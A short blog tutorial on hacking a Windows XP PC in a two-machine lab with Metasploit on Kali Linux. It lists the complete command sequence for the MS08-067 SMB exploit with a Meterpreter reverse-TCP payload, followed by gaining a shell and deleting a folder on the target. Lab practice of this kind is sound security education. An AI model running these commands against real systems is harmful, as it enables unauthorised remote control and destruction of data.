Using metasploit to hack Windows XP


A popular hack using Metasploit to enter a Windows XP PC on the network exists. In this article we shall see the steps to be followed to hack a PC on the network using metasploit from Kali Linux security distribution.

Prerequisites to hack into Windows XP PC on a network

  • A server PC or desktop PC installed with Kali Linux
  • A PC installed with Windows XP
  • Static IP address to both server and Windows XP PC

A tutorial to install Kali Linux can be found at the following URL

How to install Kali Linux

Installation has been configured with the IP address, 192.168.1.1, while the Windows XP PC has been given the IP address, 192.168.1.2

The version of Kali Linux used for this article is 2016.1released in the first half of 2016.

Prior to starting metasploit, ensure that both PCs are able to ping each other.

Starting metasploit

Metasploit is available in the left sidebar on the main interface of Kali Linux. It is also available under Applications-Favourites on the top left. Otherwise the link resides under Exploitation Tools.

Booting for the first time, metasploit creates a database. The process is automated.

starting metasploit framework

Once finished it displays the following screen.

metasploit ready for exploit

To begin type in the following commands. Use the enter key after each command.

use exploit/windows/smb/ms08_067_netapi

set RHOST 192.168.1.2

set LHOST 192.168.1.1

set LPORT 6666

set payload windows/meterpreter/reverse_tcp

LHOST IP address as earlier explained is the host PC IP address on which Kali Linux has been installed and RHOST is the IP address of the target PC. Till this point the screen should look something like below.

commands to set up metasploit

To start the process type in exploit as shown below and hit the enter key.

screen prior to hit enter

A successful process will give prompts in blue as shown below. Any error will show up as red with the description of problem.

successful exploit

Type in shell and you will get shell access.

shell access

We shall create a new directory and delete the existing one. For that we run the command of mkdir and rmdir

make directory

remove directory

The folder named one has been deleted. Type in help to see a list of commands which are applicable for this particular hack.

To come out of metasploit type exit repeatedly.

exit command

 

         

Leave a comment

Your email address will not be published. Required fields are marked *